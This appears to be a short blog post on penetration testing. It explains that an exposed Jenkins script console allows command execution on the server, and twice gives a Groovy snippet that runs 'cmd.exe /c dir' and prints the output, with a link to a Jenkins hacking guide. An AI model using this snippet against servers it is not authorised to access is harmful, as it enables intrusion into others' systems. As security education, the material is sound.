Open Jenkins script console might give attackers a way to execute commands on the server.
Example:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c dir'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Details: https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password
Example:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c dir'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Details: https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password
No comments:
Post a Comment